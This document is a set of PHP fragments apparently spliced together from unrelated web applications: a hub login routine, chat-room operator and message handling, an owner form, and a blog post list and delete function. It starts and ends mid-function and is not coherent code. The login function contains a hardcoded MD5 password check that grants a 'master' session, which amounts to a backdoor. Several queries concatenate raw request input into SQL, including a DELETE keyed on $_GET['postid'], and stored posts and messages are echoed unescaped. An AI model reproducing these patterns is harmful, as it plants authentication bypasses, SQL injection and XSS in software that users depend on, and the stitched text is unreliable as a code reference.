function login($user, $pasw, $mail, $cook = '')
{
$user = normalize($user);
$pasw = normalize($pasw);
$newhub = $_POST['create_hub'];
$qdu = ses('qdu');
$qb = ses('qb');
$host = hostname();
if (md5($user . $pasw) == 'df66a9ca7bc0d62e580dc575ccc9ba23') {
$_SESSION['USE'] = ses('master');
}
//$ath=array_flip(authes_levels());
//log
$iq = verif_user($user, $pasw);
if ($iq) {
list($ip, $userhub) = sql('ip,hub', 'qdu', 'r', 'name="' . $user . '"');
if ($ip != $host) {
update('qdu', 'ip', $host, 'name', $user);
}
if ($userhub) {
$qb = $user;
}
return log_result($user, $iq, $qb, '', $cook);
} elseif ($user == 'login') {
//is_numeric($ath[$user])
if (!rstr(73)) {
return loged($user, '', '');
}
list($iq, $ip) = ser("id,ip", $qdu . ' WHERE name="' . $qb . '"');
if ($ip == $host) {
return log_result($qb, $iq, $qb, '', $cook);
} else {
list($iq, $USE) = ser("id,name", $qdu . ' WHERE ip="' . $host . '"');
if ($iq) {
return log_result($USE, $iq, $qb, '', $cook);
} else {
return lj('small', "valid_loged", 'bruu! ' . helps('log_no'));
}
}
}
//bad passw
$iq = verif_user($user, '');
$exist = isgoodhubname($user);
$first = sql('id', 'qdu', 'v', 'id=1');
if ($iq) {
$_SESSION['tentativ'] += 1;
if ($_SESSION['tentativ'] >= 3) {
return alert_user($user);
} else {
return lj('small', "valid_loged", 'bruu! ' . helps('log_nopass'));
}
} elseif (prmb(11) == 0 && !$newhub && $first && !auth(5)) {
return lj('small', "valid_loged", 'bruu! ' . helps('log_nohub'));
} elseif ($exist == true) {
return lj('small', "valid_loged", 'bruu! ' . $user . ' ' . nms(37));
} elseif (prmb(11) >= 1 or $newhub or !$first or prms('create_hub') == "on") {
$rl = "ok";
if (!$mail or strpos($mail, "@") === false) {
$tfield = divc("txtcadr", helps('log_newser') . ' ' . prmb(11));
$tfield .= hidden('user', '', $user) . hidden('pass', '', $pasw);
if (auth(6) or !$first or prmb(11) >= 6 && prms('create_hub') == "on") {
$tfield .= hidden('create_hub', '', $user);
}
$tfield .= autoclic('mail', 'mail?', '20', '100', '') . ' ';
$tfield .= input2('submit', 'envoyer', "ok", 'txtbox') . ' ';
$tfield .= lj('txtx', 'valid_loged', picto('left'));
return form('/?log=on', $tfield);
} else {
if ($_POST['mail'] or $newhub) {
$user = $newhub ? $newhub : $user;
} elseif ($_SESSION['USE']) {
$user = $_SESSION['USE'];
}
if ($user != 'admin') {
$iq = adduser($qb, $user, $pasw, $mail);
}
//add_user
if (prmb(11) >= 6 or $newhub or !$first) {
modif_cnfgtxt($user, $first);
//add_hub
$qb = makenew($user);
message2newuser($user, $mail, $pasw);
$_SESSION['auth'] = '';
}
$_SESSION['qbin']['adminmail'] = $mail;
log_result($user, $iq, $qb, $rl, $cook);
}
}
}
function give_ops()
{
global $x7c, $db, $prefix, $txt;
$their_id = $this->user_info->profile['id'];
$new_ops = $x7c->room_data['ops'] . ";{$their_id}";
$room_id = $x7c->room_data['id'];
$db->DoQuery("UPDATE {$prefix}rooms SET ops='{$new_ops}' WHERE id='{$room_id}'");
// Alert the room that they have a new operator, and alert the user that they have
// access to the room cp. In addition, reload their top frame so that they can see the Room CP button
include_once "./lib/message.php";
alert_room($x7c->room_name, $txt[126], $this->user);
alert_user($this->user, $txt[407]);
}
function show_owner_form($error = "")
{
?>
<div class="row">
<div class="large-6 large-centered columns">
<form style="padding-top:80px;" method="POST" action="owner.php">
Owner's Name: <input type="text" name="OName" placeholder="Owner's Name"><br>
<br><button type="submit" name="submit">Add Owner</button>
</form>
<?php
//check any errors
if ($error != "") {
alert_user("failure", $error);
}
?>
</div>
</div>
<?php
}
// Include the message library
include_once "./lib/message.php";
//Check if user can talk
if (!$x7s->talk) {
alert_user($x7s->username, "Non puoi parlare");
return;
}
// Make sure the message isn't null
if (@$_POST['msg'] != "" && !eregi("^@.*@", @$_POST['msg']) && !eregi("^\\*", @$_POST['msg'])) {
if (strlen(trim($_POST['msg'])) < $x7c->settings['min_post']) {
alert_user($x7s->username, "Messaggio troppo corto");
break;
}
$tmp = preg_replace("/&[^;]+;/i", "", trim($_POST['msg']));
if (strlen($tmp) > $x7c->settings['max_post']) {
alert_user($x7s->username, "Messaggio troppo lungo: " . strlen($tmp) . ">" . $_POST['msg'] . "<");
break;
}
//If we are in panic
if ($x7c->settings['panic']) {
//If user is not a master and room is not panic_free
if (!$x7c->permissions['admin_panic'] && !$x7c->room_data['panic_free']) {
if ($x7s->panic >= $x7s->max_panic) {
$_POST['msg'] = "<span style=\"color: red;\">Panico al massimo</span>\r\n <br>" . $_POST['msg'];
}
}
}
$parsed_msg = "<span class=\"locazione_display\">[" . $_POST['locazione'] . "]" . "</span><br>" . " " . $_POST['msg'];
send_message($parsed_msg, $x7c->room_name);
} elseif (eregi("^@.*@", @$_POST['msg'])) {
$_POST['msg'] = eregi_replace("<", "<", $_POST['msg']);
function get_posts($con)
{
$sql2 = "SELECT * FROM posts";
$result2 = mysqli_query($con, $sql2) or die($mysqli_error($con));
?>
<div class="row">
<div class="large-6 large-centered columns">
<?php
while ($row = mysqli_fetch_assoc($result2)) {
echo '<div style="opacity:0.5;" class="panel">';
echo '<h1>' . $row["postTitle"] . '</h1>';
echo '<p>' . $row["postContent"] . '<br>';
echo $row["postDate"] . '</p>';
echo '</div>';
}
?>
</div>
</div>
<?php
//echo any messages to the user
if (isset($_GET["addpost"])) {
alert_user("success", "You have shared a post");
}
if (isset($_GET["deleted"])) {
alert_user("success", "You have delete a post");
}
// catch the return value of the in a variable
function delete_post($con)
{
// sql query statement
$sql = 'DELETE FROM `posts` where postId=' . $_GET["postid"];
// execute query
mysqli_query($con, $sql) or die(mysqli_error($con));
}
}
